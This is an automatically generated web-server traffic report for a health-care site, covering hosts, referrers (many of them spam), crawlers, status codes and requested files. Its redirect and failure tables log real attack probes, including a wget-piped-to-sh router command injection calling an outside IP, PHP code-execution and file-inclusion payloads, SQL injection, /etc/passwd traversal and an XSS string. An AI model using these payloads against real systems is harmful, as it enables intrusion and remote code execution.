(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the computers which encountered failed requests.
Listing the top 20 hosts by the number of failed requests, sorted by the number of failed requests.
reqs | host |
---|---|
42884 | 20.171.207.208 |
28532 | 20.171.207.85 |
11898 | 20.171.207.240 |
11383 | 20.171.207.177 |
7956 | 20.171.207.10 |
7840 | 20.171.207.35 |
7389 | 20.171.207.2 |
7189 | 10.14.0.6 |
5356 | 20.171.207.189 |
3601 | 20.171.207.160 |
3431 | 20.171.207.16 |
3209 | 20.171.207.164 |
2481 | 20.171.207.45 |
2274 | 20.171.207.120 |
2202 | 125.228.216.16 |
1762 | 216.73.216.19 |
1406 | 20.171.207.157 |
1294 | 20.171.207.19 |
1292 | 20.171.207.211 |
1190 | 20.171.207.232 |
81683 | [not listed: 10,772 hosts] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the users who requested files, if users have been authenticated or can be identified by cookies.
Listing users, sorted by the number of requests.
reqs | %bytes | user |
---|---|---|
5269 | admin |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the users who were redirected to another file.
Listing users, sorted by the number of redirected requests.
reqs | user |
---|---|
5075 | admin |
14 | ffadmin |
11 | root |
1 | 17lstbvhrzwdobgptp1gz1k23u1gfn7ztr |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the users who encountered failed requests.
Listing users, sorted by the number of failed requests.
reqs | user |
---|---|
5 | admin |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the referrers that caused redirected requests.
Listing the top 30 referring URLs by the number of redirected requests, sorted by the number of redirected requests.
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the referrers containing broken links to the site.
Listing the top 30 referring URLs by the number of failed requests, sorted by the number of failed requests.
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the referrers (where people followed links from, or pages which included this site's images).
Listing referring URLs with at least 20 requests, sorted by the number of requests.
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists which servers people followed links from.
Listing the top 30 referring sites by the number of requests, sorted by the number of requests.
reqs | site |
---|---|
46719 | http://www.healthcareandrehab.com/ |
16924 | https://www.healthcareandrehab.com/ |
8268 | http://healthcareandrehab.com/ |
1430 | https://xn--24-6kcmdg7bgtbr0a.xn--p1ai/ |
1253 | https://www.google.com/ |
1072 | https://healthcareandrehab.com:8443/ |
757 | https://ppt.cc/ |
674 | http://ppt.cc/ |
624 | http://204.209.81.232/ |
446 | https://healthcareandrehab.com/ |
364 | https://204.209.81.232:8443/ |
348 | https://seksvibor.com/ |
175 | https://champixchantixvareniclinevarnitrip.jw.lt/ |
167 | http://ivermectinhandelsnamenausland.yzz.me/ |
150 | http://sertralin-handelsname.yzz.me/ |
145 | https://fluoxetin20mgkjop.mystrikingly.com/ |
130 | https://pilledanachinausland.xobor.de/ |
130 | https://204.209.81.232/ |
120 | http://champixchantixvareniclinevarnitrip.jw.lt/ |
115 | https://voltaren-entzundung.forumieren.de/ |
110 | https://paxlovid.xobor.de/ |
105 | http://rybelsus-afvallen.forumotion.me/ |
102 | https://pantera18.ru/ |
101 | http://risedronat.xobor.de/ |
99 | https://termik18.ru/ |
98 | https://uci.edu/ |
98 | https://mit.edu/ |
96 | https://pokermira.com/ |
95 | http://semaglutidetablettenhandelsname.yzz.me/ |
95 | https://vanndrivendemidler.mw.lt/ |
7124 | [not listed: 678 sites] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the browsers used by visitors.
Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.
reqs | pages | browser |
---|---|---|
300331 | 226277 | Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html) |
70934 | 38527 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) |
12528 | 8999 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) |
11119 | 6433 | Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com) |
17342 | 6169 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 |
13108 | 4525 | Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/) |
13781 | 4254 | Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot) |
12745 | 4234 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
8362 | 3188 | Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler) |
2991 | 2355 | meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) |
8664 | 1281 | Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) |
4395 | 979 | Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) |
857 | 857 | Ruby |
1739 | 766 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
1425 | 563 | Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/) |
520 | 520 | Apache-HttpClient/4.5.2 (Java/1.8.0_151) |
1633 | 446 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36 |
360 | 360 | Apache-HttpClient/4.5.2 (Java/1.8.0_161) |
597 | 354 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
956 | 330 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36 |
422 | 285 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) |
346 | 265 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
1238 | 218 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 |
303 | 210 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.154 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
519 | 192 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 |
577 | 191 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 |
2135 | 188 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 |
842 | 177 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 |
522 | 167 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 |
155 | 155 | l9tcpid/v1.1.0 |
410 | 148 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot |
148 | 148 | Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity |
310 | 144 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 |
684 | 144 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
316 | 132 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 |
332 | 126 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
2085 | 124 | Mozilla/5.0 (iPhone; CPU iPhone OS 18_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1 |
1391 | 124 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot) |
891 | 123 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 |
377 | 118 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 |
60385 | 15506 | [not listed: 3,210 browsers] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the vendors of visitors' browsers.
Listing the top 20 browsers by the number of requests for pages, sorted by the number of requests for pages.
no. | reqs | pages | browser |
---|---|---|---|
1 | 430881 | 290729 | Netscape (compatible) |
2 | 78764 | 22310 | Chrome |
17437 | 6222 | Chrome/119 | |
14825 | 4781 | Chrome/103 | |
12337 | 1866 | Chrome/114 | |
5464 | 714 | Chrome/140 | |
2225 | 643 | Chrome/116 | |
2669 | 517 | Chrome/139 | |
1149 | 497 | Chrome/120 | |
1088 | 462 | Chrome/126 | |
1189 | 329 | Chrome/138 | |
1464 | 293 | Chrome/131 | |
3 | 27964 | 6693 | Safari |
18803 | 5251 | Safari/537 | |
5684 | 1013 | Safari/604 | |
3362 | 357 | Safari/605 | |
38 | 35 | Safari/534 | |
14 | 12 | Safari/601 | |
8 | 8 | Safari/530 | |
17 | 5 | Safari/602 | |
3 | 3 | Safari/533 | |
2 | 2 | Safari/600 | |
20 | 2 | Safari/9537 | |
4 | 2711 | 2697 | MSIE |
24 | 22 | MSIE/9 | |
18 | 15 | MSIE/6 | |
11 | 11 | MSIE/7 | |
8 | 6 | MSIE/8 | |
7 | 2 | MSIE/5 | |
3 | 1 | MSIE/10 | |
5 | 2991 | 2355 | meta-externalagent |
2991 | 2355 | meta-externalagent/1 | |
6 | 6230 | 992 | Firefox |
4065 | 561 | Firefox/114 | |
78 | 78 | Firefox/140 | |
70 | 44 | Firefox/134 | |
200 | 22 | Firefox/142 | |
156 | 22 | Firefox/143 | |
32 | 16 | Firefox/138 | |
80 | 16 | Firefox/139 | |
21 | 11 | Firefox/123 | |
13 | 10 | Firefox/3 | |
15 | 10 | Firefox/4 | |
7 | 880 | 880 | Apache-HttpClient |
880 | 880 | Apache-HttpClient/4 | |
8 | 857 | 857 | Ruby |
9 | 1329 | 669 | Mozilla |
6 | 6 | Mozilla/1 | |
2 | 2 | Mozilla/2 | |
10 | 1143 | 535 | Opera |
1135 | 531 | Opera/9 | |
6 | 4 | Opera/7 | |
11 | 1027 | 521 | Netscape |
1027 | 521 | Netscape/4 | |
12 | 155 | 155 | l9tcpid |
155 | 155 | l9tcpid/v1 | |
13 | 231 | 151 | python-requests |
231 | 151 | python-requests/2 | |
14 | 148 | 148 | Hello from Palo Alto Networks, find out more about our scans in https: |
148 | 148 | Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex | |
15 | 102 | 98 | Sogou web spider |
102 | 98 | Sogou web spider/4 | |
16 | 146 | 70 | Go-http-client |
102 | 66 | Go-http-client/1 | |
44 | 4 | Go-http-client/2 | |
17 | 139 | 68 | DuckDuckBot |
139 | 68 | DuckDuckBot/1 | |
18 | 580 | 57 | PHP |
580 | 57 | PHP/5 | |
19 | 88 | 39 | Dalvik |
88 | 39 | Dalvik/2 | |
20 | 44 | 30 | curl |
40 | 28 | curl/7 | |
2365 | 248 | [not listed: 70 browsers] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the operating systems used by visitors.
Listing operating systems, sorted by the number of requests for pages.
no. | reqs | pages | OS |
---|---|---|---|
1 | 436516 | 295060 | OS unknown |
2 | 49669 | 16136 | Windows |
16360 | 7177 | Unknown Windows | |
26740 | 6073 | Windows NT | |
3199 | 1622 | Windows XP | |
2953 | 1135 | Windows 7 | |
399 | 119 | Windows 8 | |
10 | 8 | Windows Vista | |
3 | 2 | Windows ME | |
2 | 0 | Windows 98 | |
3 | 0 | Windows 2000 | |
3 | 28178 | 8567 | Known robots |
4 | 26917 | 6844 | Unix |
26891 | 6829 | Linux | |
17 | 9 | Other Unix | |
6 | 4 | OpenBSD | |
3 | 2 | NetBSD | |
5 | 17495 | 3695 | Macintosh |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the HTTP status codes of all requests.
Listing status codes, sorted numerically.
reqs | status code |
---|---|
552555 | 200 OK |
3321 | 206 Partial content |
155332 | 301 Document moved permanently |
11 | 302 Document found elsewhere |
3629 | 304 Not modified since last retrieval |
3679 | 400 Bad request |
2316 | 403 Access forbidden |
224951 | 404 Document not found |
926 | 405 Method not allowed |
10 | 408 Request timeout |
982 | 4xx [Miscellaneous client/user errors] |
3388 | 500 Internal server error |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the sizes of files.
size | reqs | %bytes |
---|---|---|
0 | 13307 | |
1B- 10B | 39 | |
11B- 100B | 33046 | 0.01% |
101B- 1kB | 20912 | 0.02% |
1kB- 10kB | 81214 | 1.22% |
10kB-100kB | 316699 | 41.78% |
100kB- 1MB | 93795 | 54.16% |
1MB- 10MB | 493 | 2.81% |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the extensions of files.
Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.
reqs | %bytes | extension |
---|---|---|
266726 | 51.80% | .html [Hypertext Markup Language] |
155248 | 42.56% | .phtml |
1635 | 2.83% | .xml |
63157 | 0.82% | [directories] |
12313 | 0.70% | .jpg [JPEG graphics] |
10175 | 0.18% | .png [PNG graphics] |
1063 | 0.15% | .webp |
9 | 0.14% | .tif |
900 | 0.12% | .o |
48279 | 0.72% | [not listed: 58 extensions] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the directories from which files were requested. (The figures for each directory include all of its subdirectories.)
Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.
reqs | %bytes | directory |
---|---|---|
349593 | 53.46% | [root directory] |
146840 | 41.76% | /usage/ |
8825 | 3.77% | /analog/ |
11805 | 0.72% | /ammundsen/ |
40113 | 0.10% | /html/ |
503 | 0.07% | /visitors/ |
252 | 0.06% | http:// |
1556 | 0.04% | /images/ |
18 | [not listed: 1 directory] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the files that caused requests to be redirected to another file. (Usually directories with the final slash missing, or CGI scripts that forced redirections.)
Listing the top 30 files by the number of redirected requests, sorted by the number of redirected requests.
reqs | file |
---|---|
55135 | /January3014.html |
12124 | / |
20 | /?author=10 |
20 | /?author=16 |
20 | /?author=2 |
20 | /?author=8 |
19 | /?author=13 |
19 | /?author=19 |
19 | /?author=3 |
19 | /?author=6 |
19 | /?author=7 |
18 | /?act=dispBoardWrite&mid=qna |
18 | /?author=11 |
18 | /?author=12 |
18 | /?author=14 |
18 | /?author=15 |
18 | /?author=17 |
18 | /?author=1 |
18 | /?author=4 |
18 | /?author=5 |
18 | /?author=9 |
17 | /?author=18 |
17 | /?author=20 |
14 | /?q=node/add |
13 | /?f=search&keyword=aaa'or updatexml(1,concat(1,md5(1)),1)#&m=index |
13 | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
10 | /?fp=SUxk7FxHpuP30ygW2i+0XwuQFkzG8Dv+JmKUikEWRNjJ5a6zzKM93zmdTSjk2uBWZmmEIzVmg/vUGAQDEmHS4A%3D%3D&poru=XfERbEnjeH+8VN85+YQ2IIWxIMBIL4QZVag3/tOxRLJlu2nSS6qt7dy&prvtof=hytJZmQ5aiTdApgc4nWQIIPlkxZBRgP3pOUFNxrb2Fs%3D |
10 | /?phpinfo=-1 |
7611 | /usage/ref_201711.phtml |
6470 | /May2014.html |
3272 | /usage/ref_201909.phtml |
1311 | /usage/ref_201909.phtml?amp |
3144 | /February2012.html |
2840 | /robots.txt |
2444 | /usage/March2014/ref_201403.phtml |
2322 | /usage/ |
13 | /usage/?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=echo InfoOS:`uname -sn;id`OSInfo |
2308 | /usage/ref_201501.phtml |
1459 | /usage/ref_201402.phtml |
1443 | /usage/November2014/ref_201411.phtml |
1369 | /usage_202509.html |
1018 | /usage/ref_202205.phtml |
866 | /usage/ref_201301.phtml |
712 | /wp-login.php |
315 | /wp-login.php?action=register |
680 | /September2014.html |
638 | /usage/ref_201405.phtml |
564 | /usage/November2019/ref_201909.phtml |
518 | /usage/ref_202007.phtml |
466 | /usage/ref_201306.phtml/user/register/ |
405 | /usage/ref_201901.phtml |
386 | /sitemap.xml |
384 | /users.php |
376 | /users.php?mode=new |
366 | /usage/ref_201701.phtml |
365 | /usage/ref_201811.phtml |
321 | /usage/ref_201903.phtml |
318 | /usage/ref_201303.phtml |
316 | /usage/ref_202107.phtml |
19 | /usage/ref_202107.phtml?amp;amp;amp;amp;amp;amp;g2_itemid=17960 |
316 | /blog/index.php |
23 | /blog/index.php?do=/user/register/ |
44763 | [not listed: 19,563 files] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the files that caused failures, for example files not found.
Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
reqs | file |
---|---|
8382 | /usage_202509.html |
6372 | /wp-login.php |
4055 | /wp-login.php?action=register |
3475 | /usage/ref_201306.phtml/user/register/ |
1644 | /usage/ref_201306.phtml/user/register/?action=register |
3352 | /blog/index.php |
85 | /blog/index.php?do=/user/register/ |
68 | /blog/index.php?action=register |
17 | /blog/index.php?/archives/1071-More-Lottery-Bell-Canada-Spam.html |
11 | /blog/index.php?/archives/1568-More-Nigerian-Yahoo!-Spam.html |
11 | /blog/index.php?do=/user/login/ |
10 | /blog/index.php?url=archives/1705-NetKNow-now-in-NetCrafts-Top-6400.html |
2628 | /index.php |
1618 | /index.php?option=com_easyblog&view=dashboard&layout=write |
359 | /index.php?do=/user/register/ |
189 | /index.php?action=register |
168 | /index.php?do=/user/login/ |
10 | /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php |
10 | /index.php?lang=../../../../../../../../tmp/index1 |
10 | /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello |
10 | /index.php?option=com_users&view=registration |
2333 | / |
1252 | /users.php |
1226 | /users.php?mode=new |
1141 | /tiki-register.php |
760 | /usage/tiki-register.php |
594 | /blog/wp-login.php |
540 | /Current.html/trackback/stats-2013/usage_202509.html |
528 | /hcars/wp-login.php |
504 | /usage/wp-login.php |
502 | /usage/usage_202509.html |
448 | /usage/ref_201403.phtml/wp-login.php |
432 | /usage/msfree.png |
419 | /usage/index.php |
167 | /usage/index.php?do=/user/register/ |
139 | /usage/index.php?do=/user/login/ |
33 | /usage/index.php?action=register |
24 | /usage/index.php?option=com_registration&task=register |
408 | /cgi-bin/luci/ |
33 | /cgi-bin/luci/?form=country&operation=write&country=$(wget http://144.172.103.95/router.tplink.sh -O-|sh) |
18 | /cgi-bin/luci/?form=country&operation=write&country=$(wget http://0.0.0.0/router.tplink.sh -O-|sh) |
389 | /.git/config |
373 | /usage/ref_202205.phtml/trackback/ |
354 | /.env |
339 | /usage/November2014/ref_201411.phtml/trackback/ |
275 | /blog/tiki-register.php |
231 | /December2014.html/ |
24 | /December2014.html/?option="><script >alert(String.fromCharCode(88,83,83))</script> |
12 | /December2014.html/?option=/etc/passwd%00 |
12 | /December2014.html/?option=../../../etc/passwd%00 |
11 | /December2014.html/?option=../etc/passwd%00 |
11 | /December2014.html/?option=../../../../etc/passwd%00 |
11 | /December2014.html/?option=com_content'[0] |
11 | /December2014.html/?option=/etc/passwd |
11 | /December2014.html/?option=../../../../../etc/passwd%00 |
11 | /December2014.html/?option=../../../etc/passwd |
11 | /December2014.html/?option=../etc/passwd |
10 | /December2014.html/?option=../../etc/passwd |
204 | /sadlights.phtml/components/com_jnewsletter/includes/openflashchart/php-ofc-library/slingforstroke.phtml& |
204 | /March2012.html/ |
